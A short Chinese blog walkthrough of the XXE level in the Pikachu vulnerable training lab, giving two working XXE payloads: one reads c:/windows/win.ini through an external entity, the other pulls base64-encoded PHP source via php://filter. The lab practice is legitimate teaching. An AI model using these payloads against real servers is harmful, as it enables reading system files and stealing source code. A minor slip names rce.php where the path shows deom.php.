Pikachu XXE详解

在这篇文章中将详细的分析Pikachu靶场中XXE关卡的通关过程

0x01 环境

系统:Windows11
服务器:PHPstudy2018
靶场:pikachu

0x02 XXE

首先进入这个关卡可以看到提示说:这是一个接收xml数据的api

明白了不用自己找漏洞,现成的只需要输入Payload就行
接下来介绍几种常用的Payload

查看系统文件内容

<?xml version="1.0"?> 
<!DOCTYPE foo [    
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" > ]> 
<foo>&xxe;</foo>

即可查看c:/windows/win.ini的内容

查看php源代码

查看php源代码一般用php伪协议php://filter

<?xml version="1.0"?> 
<!DOCTYPE foo [    
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=C:/Users/25801/Desktop/deom.php" > ]> 
<foo>&xxe;</foo>

就可以得到base64编码的rce.php文件源代码,之后随便找一个base64解码网页解码就行

posted @ 2022-11-30 14:59  周知行  阅读(196)  评论(0编辑  收藏  举报